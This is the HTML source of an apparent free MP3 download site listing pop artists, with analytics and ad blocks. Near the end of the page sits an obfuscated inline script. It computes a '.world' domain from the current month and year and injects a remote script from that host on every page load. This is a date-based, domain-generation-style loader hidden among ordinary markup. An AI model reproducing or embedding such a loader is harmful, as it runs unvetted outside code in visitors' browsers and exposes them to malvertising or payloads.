<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-120459850-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-120459850-1');
</script>

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Avi -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-1913899988737446"
     data-ad-slot="8638548325"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<meta name="keywords" content="netinfo.in, bollywood & tollywood mp3, Video Song, English Song, Non Stop mp3, pop music, Etc." />
<meta name="description" content="free mp3 song" />
<meta http-equiv="refresh" content="60" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="content-language" content="en-CA">
<title>netinfo.in - Download All Bollywood & Tollywood Mp3-video
& All Other Song Ex- panjabi English etc.</title>
<meta name="author" content="Abhijit Das" />
<link rel="stylesheet" type="text/CSS" href="stylesheets/style.css">
<link rel="stylesheet" type="text/CSS" href="stylesheets/mystyle.css">
<style type="text/css">
<!--
.style5 {
	color: #FF0000;
	font-weight: bold;
	font-size: 24px;
}
.style6 {font-family: Arial, Helvetica, sans-serif}
body,td,th {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 100%;
	color: #003300;
}
body {
	background-repeat: repeat;
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
	background-color: #FFF;
	background-image: url();
}
.style8 {
	font-size: medium;
	color: #0000FF;
	font-weight: bold;
}
.style9 {color: #0033FF; font-weight: bold; font-size: 24px; }
.style10 {color: #000033; font-weight: bold; font-size: 36px; }
.style11 {color: #FFFFFF; font-weight: bold; font-size: 36px; }
.style12 {color: #003300; font-weight: bold; font-size: 36px; }
.style13 {color: #333300; font-weight: bold; font-size: 36px; }
.style14 {color: #990000; font-weight: bold; font-size: 36px; }
.style15 {color: #993300; font-weight: bold; font-size: 36px; }
.style16 {color: #663300; font-weight: bold; font-size: 36px; }
.style17 {color: #660000; font-weight: bold; font-size: 36px; }
.style18 {color: #CC0000; font-weight: bold; font-size: 36px; }
.style19 {color: #CC3300; font-weight: bold; font-size: 36px; }
.style20 {color: #333333; font-weight: bold; font-size: 36px; }
.style21 {color: #FFFFFF; font-weight: bold; font-size: 24px; }
.style22 {color: #9966FF; font-weight: bold; font-size: 36px; }
.style23 {color: #996600; font-weight: bold; font-size: 36px; }
.style24 {color: #0000CC; font-size: medium;}
.style25 {font-size: medium; color: #0000CC; font-weight: bold; }
.style26 {color: #0000CC}
a:link {
	color: #009;
	text-decoration: none;
}
a:hover {
	color: #F63;
	text-decoration: underline;
}
a {
	font-size: 36px;
	color: #FFFFFF;
}
a:visited {
	color: #009;
	text-decoration: none;
}
a:active {
	color: #009;
	text-decoration: none;
}
.style121 {color: #330033; font-weight: bold; font-size: 36px; }
-->
</style>
<script type="text/javascript">
<!--





function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}
//-->
</script>
</head>

<body text="#003300">
<table width="800" align="center">
  <tr>
    <th width="984" height="37" align="center" scope="col"><em><font size="10" color="#0000CD">NETINFO.IN</font></em></th>
    <th width="28" scope="col"><div align="right"><a href="https://hike.in/" target="_blank"></a><a href="https://das1059.blogspot.com/" target="_blank"><img src="image/blogger.jpg" width="35" height="35" alt="Blogger" longdesc="image/blogger.jpg" /></a></div></th>
    <th width="24" scope="col"> <div align="right"><a href="https://en-gb.facebook.com/login/" target="_blank"></a><a href="https://twitter.com/" target="_blank"><img src="image/twiter.jpg" width="35" height="35" alt="Twiter" longdesc="image/twiter.jpg" /></a></div></th>
    <th width="24" scope="col"><a href="https://hike.in/" target="_blank"><img src="image/hike.png" alt="hike.png" width="35" height="35" border="0" longdesc="image/hike.png" /></a></th>
    <th width="24" scope="col"><a href="https://www.facebook.com/dasabhi/" target="_blank"><img src="image/fb.png" alt="fb.png" width="35" height="35" border="0" longdesc="image/fb.png" /></a></th>
    <th width="24" scope="col"><a href="https://in.pinterest.com/" target="_blank"><img src="image/pinterest.jpg" width="35" height="35" alt="pinterest" longdesc="image/pinterest.jpg" /></a></th>
    <th width="24" scope="col"><a href="https://plus.google.com/discover" target="_blank"><img src="image/G+.jpg" width="35" height="35" alt="G+" longdesc="image/G+.jpg" /></a></th>
  </tr>
</table>
<table width="80%" border="0" align="center">
  <tr>
    <th width="136" height="49" align="right" scope="col" bgcolor="#666666"><a href="index.php" target="_self"><font size="6" color="#FFFFFF">HOME</font></a></th>
    <th width="119" scope="col" bgcolor="#666666"><a href="audio1.php"><font size="6" color="#FFFFFF">SONG</font></a></th>
    <th width="122" scope="col" bgcolor="#666666"><a href="vdo.php" target="_self"><font size="6" color="#FFFFFF">VIDEO</font></a></th>
    <th width="192" scope="col" bgcolor="#666666"><a href="abt.php" target="_self"><font size="6" color="#FFFFFF">ABOUT US</font></a></th>
    <th width="236" align="center" scope="col" bgcolor="#666666"><a href="cnt.php" target="_self"><font size="6" color="#FFFFFF">CONTACT US</font></a></th>
    <th width="216" align="left" scope="col" bgcolor="#666666"><a href="https://amzn.to/2JpxouS" target="_blank"><font size="6" color="#FFFFFF">MARKETING</font></a></th>
  </tr>
</table>
<table width="100%" border="0">
  <tr>
    <td height="29"><font color="#FF0000" size="+2">
      <marquee>
        FREE DOWNLOAD ALL MP3 &amp; NEW VIDEO SONG
      </marquee>
    </font></td>
  </tr>
</table>
<table width="80%" border="0">
  <tr>
    <td height="29" align="center"><strong><font color="#000000" size="+3">ARTISTS NAME</font></strong></td>
  </tr>
</table><script async="async" src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Avi -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-1913899988737446"
     data-ad-slot="8638548325"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<table width="100%" border="0">
  <tr>
    <td width="800" height="380"><table width="100%" border="0" align="left">
      <tr>
        <td bgcolor="#CCCCCC"><a href="9eng_song.html" target="_self"><strong>CHAINSMOKERS</strong></a></td>
        </tr>
      <tr>
        <td bgcolor="#999999"><strong><a href="3eng_song.html" target="_self">CHARLIE PUTH</a></strong></td>
        </tr>
      <tr>
        <td bgcolor="#CCCCCC"><a href="1eng_song.html" target="_self"><strong>JUSTIN BIEBER</strong></a></td>
        </tr>
      <tr>
        <td bgcolor="#999999"><a href="5eng_song.html" target="_self"><strong>NON STOP</strong></a></td>
        </tr>
      <tr>
        <td bgcolor="#CCCCCC"><a href="2eng_song.html" target="_self"><strong>SELENA GOMEZ</strong></a></td>
        </tr>
      <tr>
        <td bgcolor="#999999"><a href="8eng_song.html" target="_self"><strong>SHAWN MENDES</strong></a></td>
        </tr>
      <tr>
        <td height="43" bgcolor="#CCCCCC"><a href="4eng_song.html" target="_self"><strong>TYLOR SWIFT</strong></a></td>
        </tr>
      <tr>
        <td bgcolor="#999999"><strong><a href="6eng_song.html" target="_self">ZAYN MALICK</a></strong></td>
      </tr>
      <tr>
        <td bgcolor="#999999"><a href="10eng_song.html" target="_self"><strong>RIHANNA</strong></a></td>
      </tr>
    </table></td>
  </tr>
</table>
<script async="async" src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Avi -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-1913899988737446"
     data-ad-slot="8638548325"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<table width="100" border="1" align="center">
  <tr>
    <td align="center" bgcolor="#666666"><strong><a href="index.php" target="_self" class="style7">HOME</a></strong></td>
  </tr>
</table>
<div class="40874f2f5e335565efdea6debb311c6a" id="40874f2f5e335565efdea6debb311c6a"></div>
<script> (function(){ var pid='J4DDCK1'; var dx=new Date(); var f2f4033=((((dx.getMonth()+1)+''+dx.getFullYear()).replace(/[^0-9]/g, ''))*9999); var sid='1533575310'; var dv=Math.random();
var f2f0933=Math.floor(dv*9999)+1; var f2f0433='f2f0933'; var dnvc='//www.'+f2f4033+'.world/J4DDCK1:1533575310.js'; var s=document.createElement('script'); s.src=dnvc;
document.write('<div class="i'+(f2f4033*9)+''+(f2f4033*9)+'" id="i'+(f2f4033*9)+''+(f2f4033*9)+'"></div>');
document.getElementsByTagName('head')[0].appendChild(s); })(); </script>
</body>
</html>
